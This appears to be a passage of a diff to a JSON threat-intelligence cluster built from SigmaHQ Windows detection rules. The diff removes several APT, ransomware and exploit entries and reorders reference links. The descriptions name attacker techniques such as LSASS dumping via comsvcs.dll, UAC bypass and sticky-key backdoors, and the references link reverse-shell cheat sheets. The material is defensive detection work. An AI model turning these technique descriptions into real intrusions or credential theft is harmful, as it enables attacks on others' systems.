- "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "c3198a27-23a0-4c2c-af19-e5328d49680e",
- "value": "Blue Mockingbird"
- },
{
"description": "Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks",
"meta": {
@@ -53983,57 +52494,6 @@
"uuid": "e9f55347-2928-4c06-88e5-1a7f8169942e",
"value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION"
},
- {
- "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2017/09/15",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2017_8759.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100",
- "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1203",
- "attack.t1204.002",
- "attack.initial_access",
- "attack.t1566.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "fdd84c68-a1f6-47c9-9477-920584f94905",
- "value": "Exploit for CVE-2017-8759"
- },
{
"description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'",
"meta": {
@@ -54114,8 +52574,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
"https://twitter.com/bopin2020/status/1366400799199272960",
+ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_createdump.yml"
],
"tags": [
@@ -54256,8 +52716,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
"https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100",
+ "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml"
],
"tags": [
@@ -54313,41 +52773,6 @@
"uuid": "643bdcac-8b82-49f4-9fd9-25a90b929f3b",
"value": "Renamed MegaSync Execution"
},
- {
- "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant",
- "meta": {
- "author": "Florian Roth (Nextron Systems), @41thexplorer",
- "creation_date": "2018/11/20",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_apt29_phishing_campaign_indicators.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/",
- "https://twitter.com/DrunkBinary/status/1063075530180886529",
- "https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1218.011"
- ]
- },
- "related": [
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "7453575c-a747-40b9-839b-125a0aae324b",
- "value": "APT29 2018 Phishing Campaign CommandLine Indicators"
- },
{
"description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry",
"meta": {
@@ -54363,8 +52788,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/",
"https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys",
+ "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml"
],
"tags": [
@@ -54397,8 +52822,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64",
"https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64",
+ "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml"
],
"tags": [
@@ -54501,9 +52926,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.php.net/manual/en/features.commandline.php",
"https://www.revshells.com/",
"https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
+ "https://www.php.net/manual/en/features.commandline.php",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml"
],
"tags": [
@@ -54594,10 +53019,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f",
- "https://twitter.com/mrd0x/status/1511415432888131586",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/",
"https://twitter.com/mrd0x/status/1511489821247684615",
+ "https://twitter.com/mrd0x/status/1511415432888131586",
+ "https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml"
],
"tags": [
@@ -54705,11 +53130,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a",
"https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone",
- "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware",
+ "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html",
"https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/",
+ "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_rclone_execution.yml"
],
"tags": [
@@ -54775,8 +53200,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://nmap.org/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows",
+ "https://nmap.org/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nmap_zenmap.yml"
],
"tags": [
@@ -54809,8 +53234,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package",
"https://twitter.com/WindowsDocs/status/1620078135080325122",
+ "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml"
],
"tags": [
@@ -54821,41 +53246,6 @@
"uuid": "37651c2a-42cd-4a69-ae0d-22a4349aa04a",
"value": "Unsigned AppX Installation Attempt Using Add-AppxPackage"
},
- {
- "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity",
- "meta": {
- "author": "Florian Roth (Nextron Systems), wagga",
- "creation_date": "2020/12/23",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_lazarus_group_activity.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.hvs-consulting.de/lazarus-report/",
- "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_group_activity.yml"
- ],
- "tags": [
- "attack.g0032",
- "attack.execution",
- "attack.t1059"
- ]
- },
- "related": [
- {
- "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "24c4d154-05a4-4b99-b57d-9b977472443a",
- "value": "Lazarus Group Activity"
- },
{
"description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.",
"meta": {
@@ -54869,9 +53259,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
"https://twitter.com/vxunderground/status/1423336151860002816",
"https://attack.mitre.org/software/S0404/",
- "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"
],
"tags": [
@@ -55011,39 +53401,6 @@
"uuid": "771d1eb5-9587-4568-95fb-9ec44153a012",
"value": "PUA - NSudo Execution"
},
- {
- "description": "Detects specific process characteristics of Snatch ransomware word document droppers",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/08/26",
- "falsepositive": [
- "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely"
- ],
- "filename": "proc_creation_win_malware_snatch_ransomware.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_snatch_ransomware.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1204"
- ]
- },
- "related": [
- {
- "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "5325945e-f1f0-406e-97b8-65104d393fff",
- "value": "Potential Snatch Ransomware Activity"
- },
{
"description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors",
"meta": {
@@ -55090,8 +53447,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/cglyer/status/1182391019633029120",
"https://twitter.com/cglyer/status/1182389676876980224",
+ "https://twitter.com/cglyer/status/1182391019633029120",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml"
],
"tags": [
@@ -55235,14 +53592,14 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection",
+ "https://twitter.com/gN3mes1s/status/941315826107510784",
+ "https://github.com/SigmaHQ/sigma/issues/3742",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
"https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e",
- "https://reaqta.com/2017/12/mavinject-microsoft-injector/",
- "https://twitter.com/Hexacorn/status/776122138063409152",
- "https://github.com/SigmaHQ/sigma/issues/3742",
- "https://twitter.com/gN3mes1s/status/941315826107510784",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md",
- "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection",
+ "https://twitter.com/Hexacorn/status/776122138063409152",
+ "https://reaqta.com/2017/12/mavinject-microsoft-injector/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml"
],
"tags": [
@@ -55317,8 +53674,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz",
"https://github.com/skelsec/pypykatz",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_pypykatz.yml"
],
"tags": [
@@ -55384,9 +53741,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048",
"https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44",
"https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
- "https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml"
],
"tags": [
@@ -55531,8 +53888,8 @@
"logsource.product": "windows",
"refs": [
"https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
- "https://twitter.com/frack113/status/1555830623633375232",
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
+ "https://twitter.com/frack113/status/1555830623633375232",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml"
],
"tags": [
@@ -55609,37 +53966,6 @@
"uuid": "fa3c117a-bc0d-416e-a31b-0c0e80653efb",
"value": "Chopper Webshell Process Pattern"
},
- {
- "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia",
- "meta": {
- "author": "@41thexplorer, Microsoft Defender ATP",
- "creation_date": "2019/11/12",
- "falsepositive": "No established falsepositives",
- "filename": "proc_creation_win_apt_tropictrooper.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_tropictrooper.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79",
- "value": "TropicTrooper Campaign November 2018"
- },
{
"description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process",
"meta": {
@@ -55687,40 +54013,6 @@
"uuid": "a383dec4-deec-4e6e-913b-ed9249670848",
"value": "Potential Signing Bypass Via Windows Developer Features"
},
- {
- "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Markus Neis",
- "creation_date": "2020/02/01",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1574.002",
- "attack.g0044"
- ]
- },
- "related": [
- {
- "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "3121461b-5aa0-4a41-b910-66d25524edbb",
- "value": "Winnti Malware HK University Campaign"
- },
{
"description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)",
"meta": {
@@ -55735,11 +54027,11 @@
"logsource.product": "windows",
"refs": [
"https://twitter.com/shantanukhande/status/1229348874298388484",
- "https://twitter.com/Wietze/status/1542107456507203586",
+ "https://twitter.com/pythonresponder/status/1385064506049630211?s=21",
"https://twitter.com/SBousseaden/status/1167417096374050817",
"https://twitter.com/Hexacorn/status/1224848930795552769",
+ "https://twitter.com/Wietze/status/1542107456507203586",
"https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/",
- "https://twitter.com/pythonresponder/status/1385064506049630211?s=21",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml"
],
"tags": [
@@ -55782,9 +54074,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Regasm/",
- "https://www.fortiguard.com/threat-signal-report/4718?s=09",
"https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/",
+ "https://www.fortiguard.com/threat-signal-report/4718?s=09",
+ "https://lolbas-project.github.io/lolbas/Binaries/Regasm/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"
],
"tags": [
@@ -55850,8 +54142,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
"http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml"
],
"tags": [
@@ -55885,11 +54177,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/christophetd/status/1164506034720952320",
"https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html",
- "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks",
"https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html",
"https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/",
- "https://twitter.com/christophetd/status/1164506034720952320",
+ "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml"
],
"tags": [
@@ -55990,12 +54282,12 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
+ "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer",
"https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
"https://labs.f-secure.com/blog/prelude-to-ransomware-systembc",
"https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner",
"https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/",
- "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer",
+ "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml"
],
"tags": [
@@ -56036,8 +54328,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
"https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/",
+ "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml"
],
"tags": [
@@ -56071,11 +54363,11 @@
"logsource.product": "windows",
"refs": [
"https://twitter.com/eral4m/status/1479080793003671557",
- "https://twitter.com/Hexacorn/status/885258886428725250",
+ "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52",
"https://twitter.com/nas_bench/status/1433344116071583746",
"https://twitter.com/eral4m/status/1479106975967240209",
"http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/",
- "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52",
+ "https://twitter.com/Hexacorn/status/885258886428725250",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"
],
"tags": [
@@ -56108,8 +54400,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100",
"https://adsecurity.org/?p=2288",
+ "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml"
],
"tags": [
@@ -56142,8 +54434,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
+ "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml"
],
"tags": [
@@ -56176,9 +54468,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
"https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime",
+ "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml"
],
"tags": [
@@ -56356,9 +54648,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4",
"https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0",
"https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/",
+ "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml"
],
"tags": [
@@ -56378,58 +54670,6 @@
"uuid": "efec536f-72e8-4656-8960-5e85d091345b",
"value": "Set Suspicious Files as System Files Using Attrib.EXE"
},
- {
- "description": "Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Tom Ueltschi",
- "creation_date": "2019/01/16",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_notpetya.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://securelist.com/schroedingers-petya/78870/",
- "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.011",
- "attack.t1070.001",
- "attack.credential_access",
- "attack.t1003.001",
- "car.2016-04-002"
- ]
- },
- "related": [
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "79aeeb41-8156-4fac-a0cd-076495ab82a1",
- "value": "NotPetya Ransomware Activity"
- },
{
"description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).",
"meta": {
@@ -56660,40 +54900,6 @@
"uuid": "90d50722-0483-4065-8e35-57efaadd354d",
"value": "Arbitrary MSI Download Via Devinit.EXE"
},
- {
- "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/03/03",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2021_26857_msexchange.yml"
- ],
- "tags": [
- "attack.t1203",
- "attack.execution",
- "cve.2021.26857"
- ]
- },
- "related": [
- {
- "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887",
- "value": "Potential CVE-2021-26857 Exploitation Attempt"
- },
{
"description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n",
"meta": {
@@ -56727,40 +54933,6 @@
"uuid": "f548a603-c9f2-4c89-b511-b089f7e94549",
"value": "Potential Persistence Via Microsoft Compatibility Appraiser"
},
- {
- "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Maxime Thiebaut",
- "creation_date": "2021/08/23",
- "falsepositive": [
- "User selecting a different installation folder (check for other sub processes of this explorer.exe process)"
- ],
- "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/j0nh4t/status/1429049506021138437",
- "https://streamable.com/q2dsji",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_other_razorinstaller_lpe.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1553"
- ]
- },
- "related": [
- {
